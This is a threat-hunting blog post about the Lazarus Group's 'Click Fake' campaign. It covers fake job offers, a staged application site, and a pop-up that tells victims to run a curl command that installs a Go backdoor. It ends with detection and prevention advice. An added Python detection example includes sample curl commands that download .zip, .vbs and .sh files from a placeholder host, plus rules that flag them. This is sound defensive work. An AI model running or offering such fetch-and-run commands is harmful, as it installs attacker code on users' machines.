Welcome
Welcome back to the Threat Hunters Corner! I’m Josh Shepard, Principal Threat Hunter at Radicl, and in this episode, we’ll be diving into a recent campaign orchestrated by the North Korean threat actor Lazarus Group. In this campaign, Lazarus Group tricks a user into running a malicious script on their machine by having them apply for a job that is just a little too good to be true.
RADBot Generated Text Summary
Unmasking the Lazarus Group's Click Fake Campaign: A Deep Dive into Sophisticated Job Schemes
Hey everyone, Josh Shepherd here, Principal Threat Hunter at Radicl. Welcome to this edition of the Threat Hunters Corner. Today, we’re diving into a recent campaign orchestrated by the notorious Lazarus Group, a North Korean nation-state threat actor known for its dual focus on cyber espionage and e-crime.
Who is the Lazarus Group?
The Lazarus Group, backed by North Korea, engages in a variety of cyber activities ranging from traditional espionage to financially motivated cybercrimes. Their operations often aim to bolster North Korea's national defense budget through illicit means such as cryptocurrency theft and extortion campaigns.
The Click Fake Campaign
The latest campaign, dubbed "Click Fake," exemplifies the group's sophisticated approach to social engineering. Here’s how it unfolds:
- Target Identification: The Lazarus Group identifies potential victims through LinkedIn, focusing on individuals whose professional backgrounds align with the fabricated job opportunities they create.
- Personalized Messaging: Victims receive highly personalized messages suggesting they are ideal candidates for a dream job, complete with attractive benefits and pay.
- Realistic Job Application Process: Victims are directed to a convincing job application website where they undergo a comprehensive application process, including uploading resumes, answering demographic questions, and agreeing to terms and conditions.
- Malicious Video and Microphone Check: The final step involves a video and microphone check, which inevitably fails. A pop-up then instructs the user to run a specific command.
The Technical Breakdown
The campaign targets both Windows and macOS users, adapting its approach based on the victim's operating system, as determined by the user agent string.
- Windows Users: Victims are prompted to press Windows + R, type CMD, and execute a curl command. This command downloads a .zip file that eventually leads to the installation of a backdoor written in Go, granting persistent access to the threat actor.
- macOS Users: Victims are instructed to open Terminal and run a similar curl command, which also results in the installation of a Go-based backdoor.
The execution flow involves the following steps:
- Curl Command Execution: The copied curl command reaches out to an adversary-controlled server to download a .zip file.
- Script Execution: The .zip file contains a Bash script for macOS users and a VBS script for Windows users. These scripts then contact another command-and-control (C2) server to fetch the final Go backdoor payload.
Detection and Prevention Strategies
Detection
- Command Execution Monitoring: On Windows, create analytics to detect explorer.exe spawning a cmd.exe process that subsequently runs a curl command. This sequence is unusual for regular users and can indicate malicious activity.
- Curl Command Analysis: Monitor for curl commands that download .zip, .sh, or .vbs files. While this may generate false positives, tuning these alerts to exclude legitimate IT or development activities can help identify suspicious behavior.
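As an added example (not code from the episode or from Radicl), the two detection ideas above expressed as rules and run over a handful of constructed process-creation events; the event fields, sample command lines and the excluded build account are assumptions made for illustration.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent: str   # parent process image name (assumed field)
    image: str    # process image name (assumed field)
    cmdline: str  # full command line (assumed field)
    user: str     # account that launched the process (assumed field)

# Constructed sample telemetry, not real events.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "cmd.exe", "cmd.exe /c curl -o check.zip http://example.invalid/update.zip", "alice"),
    ProcEvent("explorer.exe", "cmd.exe", "cmd.exe /c dir", "alice"),
    ProcEvent("cmd.exe", "curl.exe", "curl.exe -O http://example.invalid/a.vbs", "bob"),
    ProcEvent("code.exe", "cmd.exe", "cmd.exe /c curl -o deps.zip http://example.invalid/deps.zip", "devops-build"),
    ProcEvent("bash", "curl", "curl -s https://example.invalid/setup.sh -o /tmp/setup.sh", "mallory"),
]

# File types called out in the episode: archives and scripts fetched by curl.
SUSPICIOUS_EXT = re.compile(r"\.(zip|sh|vbs)\b", re.IGNORECASE)
# Hypothetical IT/dev accounts excluded after tuning to cut false positives.
TUNED_OUT_USERS = {"devops-build"}

def explorer_cmd_curl(ev: ProcEvent) -> bool:
    """Rule 1: explorer.exe -> cmd.exe whose command line invokes curl."""
    return (ev.parent.lower() == "explorer.exe"
            and ev.image.lower() == "cmd.exe"
            and "curl" in ev.cmdline.lower())

def curl_fetches_script_or_archive(ev: ProcEvent) -> bool:
    """Rule 2: any curl command line referencing a .zip, .sh or .vbs file."""
    return "curl" in ev.cmdline.lower() and SUSPICIOUS_EXT.search(ev.cmdline) is not None

def evaluate(events, excluded_users=TUNED_OUT_USERS):
    """Return (user, [rules fired]) for every event that trips at least one rule."""
    findings = []
    for ev in events:
        if ev.user in excluded_users:   # tuning: skip approved IT/dev accounts
            continue
        fired = []
        if explorer_cmd_curl(ev):
            fired.append("explorer_cmd_curl")
        if curl_fetches_script_or_archive(ev):
            fired.append("curl_zip_sh_vbs")
        if fired:
            findings.append((ev.user, fired))
    return findings

if __name__ == "__main__":
    for user, rules in evaluate(SAMPLE_EVENTS):
        print(f"{user}: {', '.join(rules)}")
```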
Prevention
- User Education: Educate users about evolving social engineering techniques. Emphasize the importance of skepticism, especially when asked to run scripts from unfamiliar websites. Encourage users to contact IT support if they encounter such requests.
- Security Awareness Training: Incorporate specific warnings about job-related phishing schemes into your security awareness programs. Highlight the risks of executing commands or downloading files from untrusted sources.
Conclusion
The Click Fake campaign by the Lazarus Group is a prime example of how sophisticated social engineering can be used to compromise systems. By understanding their tactics and implementing robust detection and prevention measures, organizations can better protect themselves against such threats.
If you have any questions or need further assistance, please feel free to reach out. Stay safe out there, and see you on the next edition of the Threat Hunters Corner.